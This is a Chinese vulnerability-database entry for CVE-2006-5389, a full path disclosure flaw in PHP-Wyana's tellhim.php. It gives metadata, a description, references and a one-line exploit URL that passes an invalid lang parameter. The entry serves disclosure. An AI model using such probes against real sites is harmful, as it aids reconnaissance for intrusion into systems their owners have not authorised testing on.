PHP-Wyana 'tellhim.php'lang参数敏感信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193130 漏洞类型 未知
发布时间 2006-10-18 更新时间 2006-10-18
CVE编号 CVE-2006-5389 CNNVD-ID CNNVD-200610-322
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/87566
https://cxsecurity.com/issue/WLB-2006100107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-322
|漏洞详情
PHP-Wyana中的tools/tellhim.php存在参数敏感信息泄露漏洞,远程攻击者可以借助于无效的lang参数获取敏感信息,从而在出错消息中透露路径。
|漏洞EXP
Hello
Vulnerable: PHP-Wyana
http://www.wyana.com

Exploit :
http://www.example.com/site/tools/tellhim.php?lang=['anything']

Discovery by Linux_Drox

Special Gr8 To : S-H-T

LeZr.Com

Best Regards ,,
|受影响的产品
Wyana Php-Wyana 0
|参考资料

来源:XF
名称:phpwyana-tellhim-path-disclosure(29601)
链接:http://xforce.iss.net/xforce/xfdb/29601
来源:BUGTRAQ
名称:20061014FullPathDisclosureinPHP-Wyana
链接:http://www.securityfocus.com/archive/1/archive/1/448789/100/0/threaded
来源:SREASON
名称:1743
链接:http://securityreason.com/securityalert/1743